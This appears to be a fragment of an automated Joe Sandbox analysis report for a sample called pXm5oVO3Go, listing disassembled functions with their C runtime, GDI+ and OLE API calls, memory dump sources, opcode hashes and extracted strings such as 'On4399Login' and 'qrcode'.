                                  • API String ID: 637971194-0
                                  • Opcode ID: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                  • Instruction ID: 916c6ec87c4f8bcbc955037b591a6f753094f0854a764fd24730189219927c90
                                  • Opcode Fuzzy Hash: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                  • Instruction Fuzzy Hash: 5401AD75404B40EBF320CF69C84575ABBE0EF00320F10890EE49A97BA1CBB4FA41CB11
                                  APIs
                                  • __getptd.LIBCMT ref: 00646CB0
                                    • Part of subcall function 00645CA8: __getptd_noexit.LIBCMT ref: 00645CAB
                                    • Part of subcall function 00645CA8: __amsg_exit.LIBCMT ref: 00645CB8
                                  • __getptd.LIBCMT ref: 00646CC7
                                  • __amsg_exit.LIBCMT ref: 00646CD5
                                  • __lock.LIBCMT ref: 00646CE5
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00646CF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: d4e355a559bb1b7d1e0f6e6558cc2fe086a99abab3a58efd638bb4dfc9e87ffc
                                  • Instruction ID: 620a938ebbe17e2657e0a0ef6a5b5746d7c8c0ba285f30f13d41fe036d09b152
                                  • Opcode Fuzzy Hash: d4e355a559bb1b7d1e0f6e6558cc2fe086a99abab3a58efd638bb4dfc9e87ffc
                                  • Instruction Fuzzy Hash: FDF09032944710ABE7A4BB74D84378D36A2AF02721F10414DF0596B2D2CB6859818AAE
                                  APIs
                                  • __getptd.LIBCMT ref: 0364E7F0
                                    • Part of subcall function 0364EA0D: __getptd_noexit.LIBCMT ref: 0364EA10
                                    • Part of subcall function 0364EA0D: __amsg_exit.LIBCMT ref: 0364EA1D
                                  • __getptd.LIBCMT ref: 0364E807
                                  • __amsg_exit.LIBCMT ref: 0364E815
                                  • __lock.LIBCMT ref: 0364E825
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0364E839
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                  • Instruction ID: 8b720f0c0fe1bc5cbba69a2b20d163b98e4707acb7219beaf0aed34ecda76c65
                                  • Opcode Fuzzy Hash: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                  • Instruction Fuzzy Hash: 3EF0B436D04711DFEB60FBB49A45B5D7790BF00720F14814DE011AF2D2CF7694818B9A
                                  APIs
                                  • __getptd.LIBCMT ref: 1000E7EC
                                    • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                    • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                  • __getptd.LIBCMT ref: 1000E803
                                  • __amsg_exit.LIBCMT ref: 1000E811
                                  • __lock.LIBCMT ref: 1000E821
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 1000E835
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                  • Instruction ID: c1e581abf6b3aa3cedc770c51710619a043d372c1d0baf30f0e204b42916052b
                                  • Opcode Fuzzy Hash: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                  • Instruction Fuzzy Hash: B2F06D36A04790DAF660EBA45806B5E33A0EF407E0F21814AF518B65DBCF24AD419B56
                                  APIs
                                    • Part of subcall function 00547FF4: __EH_prolog3.LIBCMT ref: 00547FFB
                                  • LoadIconW.USER32(?,00000080), ref: 00410554
                                  • std::exception::exception.LIBCMT ref: 0041058B
                                    • Part of subcall function 00638987: std::exception::_Copy_str.LIBCMT ref: 006389A2
                                  • __CxxThrowException@8.LIBCMT ref: 004105A0
                                    • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,ED2F953D,006FC518,00401FC3,?,0071C220,?,ED2F953D), ref: 00641CCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Copy_strExceptionException@8H_prolog3IconLoadRaiseThrowstd::exception::_std::exception::exception
                                  • String ID: HOST=%d PARAM1=%s
                                  • API String ID: 500386467-510288069
                                  • Opcode ID: a02846fbc93f5e784fd72039f5fdc23d11aa67a562bafda45b03b8c25ba9f00f
                                  • Instruction ID: 3c8d3bc684d60fcecd5c8dfe43502e13f45b14ae440c8b5b3ed01ffbc29c50ef
                                  • Opcode Fuzzy Hash: a02846fbc93f5e784fd72039f5fdc23d11aa67a562bafda45b03b8c25ba9f00f
                                  • Instruction Fuzzy Hash: AD51E1B06043459FDB50DF78C8857DBBBE8AF08714F00852EE55ADB382DB78A984CB91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID: qrcode
                                  • API String ID: 269201875-2768184300
                                  • Opcode ID: b7ae724dab59976927405755fddd42096b275a2b9ae2b92c7d1d6adc51a94ade
                                  • Instruction ID: c0c9aa430fc308d1607b363f79eebbeb712cfc187a753c9d430ef2ce2b4ae81c
                                  • Opcode Fuzzy Hash: b7ae724dab59976927405755fddd42096b275a2b9ae2b92c7d1d6adc51a94ade
                                  • Instruction Fuzzy Hash: DB6103B1E042589FDB10DFA9C88179EBBB5FF48304F1081AEE449EB241DB746A85CF95
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401A9C
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401AB6
                                  • _memmove.LIBCMT ref: 00401B0C
                                    • Part of subcall function 00401D30: std::_Xinvalid_argument.LIBCPMT ref: 00401D49
                                    • Part of subcall function 00401D30: std::_Xinvalid_argument.LIBCPMT ref: 00401D6A
                                    • Part of subcall function 00401D30: std::_Xinvalid_argument.LIBCPMT ref: 00401D85
                                    • Part of subcall function 00401D30: _memmove.LIBCMT ref: 00401DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$_memmove
                                  • String ID: string too long
                                  • API String ID: 2168136238-2556327735
                                  • Opcode ID: 5111ff37cf27c43911fabb825e62defa93693cee735bf3554952fd6fa4e93fe8
                                  • Instruction ID: 97b060a13575e745853b417087fd149ece5be724ff5a1c7c5cfeaf1b1d037eb8
                                  • Opcode Fuzzy Hash: 5111ff37cf27c43911fabb825e62defa93693cee735bf3554952fd6fa4e93fe8
                                  • Instruction Fuzzy Hash: 5431D3323006104BD7249E5DE88096BF7EAEFD2760B60493FF496976E1D774AC448BA8
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argument_memmovestd::_
                                  • String ID: P:@$string too long
                                  • API String ID: 256744135-887560500
                                  • Opcode ID: 01d2339d28d8993f240ba90f0c4f54b57ff6d7e0425e8d1d6e3a331d66730f60
                                  • Instruction ID: e1572dfa30291538e1104b65d0c9648f690ed9276a06c13b321248f19cecc49b
                                  • Opcode Fuzzy Hash: 01d2339d28d8993f240ba90f0c4f54b57ff6d7e0425e8d1d6e3a331d66730f60
                                  • Instruction Fuzzy Hash: E9319236314A148BCA24AE5CE98086BB3EAEFD1711720492FE442D7690D735AC45DFA9
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405474
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405483
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                  • String ID: string too long
                                  • API String ID: 963545896-2556327735
                                  • Opcode ID: 5fc5c3486ac89371a71539facb618ac1118246e8fbfd7318b339debac40097cf
                                  • Instruction ID: cc32dd397e5fbe50cd7e113d676059e06672086655c2f4c6a8c45dde24df3c6e
                                  • Opcode Fuzzy Hash: 5fc5c3486ac89371a71539facb618ac1118246e8fbfd7318b339debac40097cf
                                  • Instruction Fuzzy Hash: 3621C832304A545BC7319A5C98006ABFBE9DFA2722F20496FF5909B3D1C3759884CBA9
                                  APIs
                                    • Part of subcall function 005475A7: __EH_prolog3.LIBCMT ref: 005475AE
                                    • Part of subcall function 005475A7: lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,00000001,?), ref: 005475E8
                                    • Part of subcall function 005475A7: VariantClear.OLEAUT32(?), ref: 00547654
                                    • Part of subcall function 005475A7: VariantClear.OLEAUT32(?), ref: 0054765A
                                    • Part of subcall function 005475A7: VariantClear.OLEAUT32(?), ref: 00547660
                                    • Part of subcall function 005475A7: VariantClear.OLEAUT32(00000000), ref: 00547666
                                    • Part of subcall function 005475A7: SysFreeString.OLEAUT32(?), ref: 0054766B
                                  • VariantCopy.OLEAUT32(00000000,?), ref: 004129F0
                                  • VariantChangeType.OLEAUT32 ref: 00412A22
                                  • VariantClear.OLEAUT32(?), ref: 00412A44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$ChangeCopyFreeH_prolog3StringTypelstrlen
                                  • String ID: On4399Login
                                  • API String ID: 3003656826-719521963
                                  • Opcode ID: 0c73eddbf2bcf25958b6e0e781ce6a07445fd9abe0e3f12cfb96ee8b58a3d5cd
                                  • Instruction ID: 5d222733b6dc8b3f54be17e695bbb7c01374b1a4a9ed15aaa50285a240750d4c
                                  • Opcode Fuzzy Hash: 0c73eddbf2bcf25958b6e0e781ce6a07445fd9abe0e3f12cfb96ee8b58a3d5cd
                                  • Instruction Fuzzy Hash: FD216B71208701AFD310DF28CC46B5BB7E9FF89724F008A2DF595D7290EB78A9048B96
                                  APIs
                                  • __time64.LIBCMT ref: 004038C4
                                    • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                    • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                  • __localtime64_s.LIBCMT ref: 004038D7
                                  • _memset.LIBCMT ref: 004038F2
                                    • Part of subcall function 00406490: _vswprintf_s.LIBCMT ref: 004064A1
                                  Strings
                                  • %04d-%02d-%02d %02d:%02d:%02d, xrefs: 00403928
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Time$FileSystem__aulldiv__localtime64_s__time64_memset_vswprintf_s
                                  • String ID: %04d-%02d-%02d %02d:%02d:%02d
                                  • API String ID: 3156645594-4146437471
                                  • Opcode ID: a16a008088b9f56a31778b2dcf5c1334517a543c49de5ed3ede09de6744d7d87
                                  • Instruction ID: 15b2947ff6a5db42539aadc5135ab5fbd8eee3ececa8eac2c0325d1fac083d0f
                                  • Opcode Fuzzy Hash: a16a008088b9f56a31778b2dcf5c1334517a543c49de5ed3ede09de6744d7d87
                                  • Instruction Fuzzy Hash: A12162719002189BCB64EF94DC49BEBB3B9EF48304F4042DDA50A97241DB78AF44CF94
                                  APIs
                                  • __time64.LIBCMT ref: 00422FD4
                                    • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                    • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                  • __localtime64_s.LIBCMT ref: 00422FE7
                                  • _memset.LIBCMT ref: 00423002
                                    • Part of subcall function 00406490: _vswprintf_s.LIBCMT ref: 004064A1
                                  Strings
                                  • %04d_%02d_%02d_%02d_%02d_%02d, xrefs: 00423038
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Time$FileSystem__aulldiv__localtime64_s__time64_memset_vswprintf_s
                                  • String ID: %04d_%02d_%02d_%02d_%02d_%02d
                                  • API String ID: 3156645594-93539013
                                  • Opcode ID: 0526b4803325ebd150cafc0210276a305306880acaed0b59d1ebb4d9f9cf6030
                                  • Instruction ID: d5d1dacfc4af3f9f040ec24c02856240f88c3ff2530fd8b4ec03b638b15ec1f6
                                  • Opcode Fuzzy Hash: 0526b4803325ebd150cafc0210276a305306880acaed0b59d1ebb4d9f9cf6030
                                  • Instruction Fuzzy Hash: FD2142719112189BCB64EF54DC49BDBB3F9EF48704F4042DDA40A97241DB78AB44CF95
                                  APIs
                                  • __time64.LIBCMT ref: 004039B4
                                    • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                    • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                  • __localtime64_s.LIBCMT ref: 004039C7
                                  • _memset.LIBCMT ref: 004039E2
                                    • Part of subcall function 00406490: _vswprintf_s.LIBCMT ref: 004064A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Time$FileSystem__aulldiv__localtime64_s__time64_memset_vswprintf_s
                                  • String ID: %d-%d-%d
                                  • API String ID: 3156645594-1067691376
                                  • Opcode ID: c5c87357be4c98ca3ecd8e5a9591ece30f3b8fa64cc049ffa35eda3bbaa30f68
                                  • Instruction ID: 23a16f6b0a6d0b17663dc7892d2e80e6e6363daeedcece8f305be328ad56f313
                                  • Opcode Fuzzy Hash: c5c87357be4c98ca3ecd8e5a9591ece30f3b8fa64cc049ffa35eda3bbaa30f68
                                  • Instruction Fuzzy Hash: 0A1151759003189BCB64EF54DC49BEBB3F9EF48704F4046D9A80A97241EB786B44CF95
                                  APIs
                                  • GdipCreateBitmapFromStream.GDIPLUS ref: 0042597D
                                  • GdipDisposeImage.GDIPLUS(?), ref: 00425994
                                  • GdipDisposeImage.GDIPLUS(?,005A0D08), ref: 004259BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                  • String ID: hqm
                                  • API String ID: 800915452-3164739288
                                  • Opcode ID: 6f22389f9ee89c898598460b817fd1876523e87269959f077286564e6c20e882
                                  • Instruction ID: c1ef16143cb8cd1fc15283b845f64306847cceadf28a02d869238304c3ffdad0
                                  • Opcode Fuzzy Hash: 6f22389f9ee89c898598460b817fd1876523e87269959f077286564e6c20e882
                                  • Instruction Fuzzy Hash: 3D018FB2608225AB8310EF18A84485FFBE9EBC8721F004A1FF944D3310DA34C945CBEA
                                  APIs
                                  • ___BuildCatchObject.LIBCMT ref: 036511E2
                                    • Part of subcall function 0365113D: ___BuildCatchObjectHelper.LIBCMT ref: 03651173
                                  • _UnwindNestedFrames.LIBCMT ref: 036511F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                  • String ID: csm$csm
                                  • API String ID: 3487967840-3733052814
                                  • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                  • Instruction ID: 5fa5d94fe26b07c38bf4a866a620b82beead742ddc331e6701a6d94e90396ba4
                                  • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                  • Instruction Fuzzy Hash: E701FB7540120ABBDF22AF51CD85EAA7F6AFF09354F044064BD1859220D736D9B1DBA4
                                  APIs
                                  • ___BuildCatchObject.LIBCMT ref: 100111DE
                                    • Part of subcall function 10011139: ___BuildCatchObjectHelper.LIBCMT ref: 1001116F
                                  • _UnwindNestedFrames.LIBCMT ref: 100111F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                  • String ID: csm$csm
                                  • API String ID: 3487967840-3733052814
                                  • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                  • Instruction ID: 13fce880b5995998a5e615debbc516f60a37a3f13fe80d83b25b8dab8ba688de
                                  • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                  • Instruction Fuzzy Hash: B401FB3540110ABBDF169F51CC85EDA7F6AFF08394F004010FD5819121D776E9B1DBA0
                                  APIs
                                  • std::exception::exception.LIBCMT ref: 00426746
                                  • __CxxThrowException@8.LIBCMT ref: 0042675B
                                    • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                  • String ID: ieB6A7Au6A"$u6A"
